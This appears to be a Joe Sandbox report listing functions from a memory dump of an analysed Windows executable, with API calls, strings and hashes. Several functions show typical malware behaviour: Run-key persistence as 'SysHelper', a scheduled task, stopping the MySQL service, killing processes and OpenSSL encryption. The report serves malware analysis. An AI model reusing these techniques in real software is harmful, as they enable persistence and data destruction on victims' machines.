Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

Service-0x, xrefs: 00454A80
_OPENSSL_isservice, xrefs: 004549D1

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Comment, xrefs: 0040DBFF
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
--Task, xrefs: 0040DBB5

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 3d21c91553e7a2c47b75248eed8174f0ef509435366e908d9b787f559111c5f4
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 3d21c91553e7a2c47b75248eed8174f0ef509435366e908d9b787f559111c5f4
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

fopen(', xrefs: 00465611
.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640
',', xrefs: 0046560B

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

\, xrefs: 0040F548
Shell32.dll, xrefs: 0040F32C
SHGetFolderPathW, xrefs: 0040F34D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: 794de65d126af65ce722b4b6d82f990fd5aed4b0eec27fc4de4360034f884efb
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: 794de65d126af65ce722b4b6d82f990fd5aed4b0eec27fc4de4360034f884efb
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

\\n, xrefs: 0040CC1B
 , xrefs: 0040CCAF
Error encrypting message: %s, xrefs: 0040CE67

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 128416f102af0a080c1f2d632d4bd0007c2a6401087c60a73ae34128535de065
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 128416f102af0a080c1f2d632d4bd0007c2a6401087c60a73ae34128535de065
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

DEK-Info: , xrefs: 00463422
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
ENCRYPTED, xrefs: 004633BC
Proc-Type: , xrefs: 0046337C

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(00000001,00000000,0042520D,00420CE9,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6
, xrefs: 00457482
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
DispatchMessageW.USER32(?), ref: 00411B5C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
